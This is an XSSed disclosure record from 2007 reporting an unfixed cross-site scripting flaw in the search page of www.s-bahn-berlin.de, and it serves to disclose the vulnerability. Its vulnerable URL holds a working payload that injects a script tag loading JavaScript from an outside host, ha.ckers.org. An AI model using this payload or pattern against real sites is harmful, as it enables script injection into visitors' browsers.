Unfixed XSS vulnerability at www.s-bahn-berlin.de

2007-03-10T00:00:00
ID XSSED:21468
Type xssed
Reporter Renoized
Modified 2007-03-10T00:00:00

Description

Security researcher Renoized, has submitted on 03/10/2007 a cross-site-scripting (XSS) vulnerability affecting www.s-bahn-berlin.de, which at the time of submission ranked 142061 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/10/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.s-bahn-berlin.de/suche/index.php?cx=015723998419849412855:fqyojabclx0&q=\%22%3E%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E%20'S-Bahn%20Berlin%20GmbH'&cof=FORID:9&string=\%22%3E%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E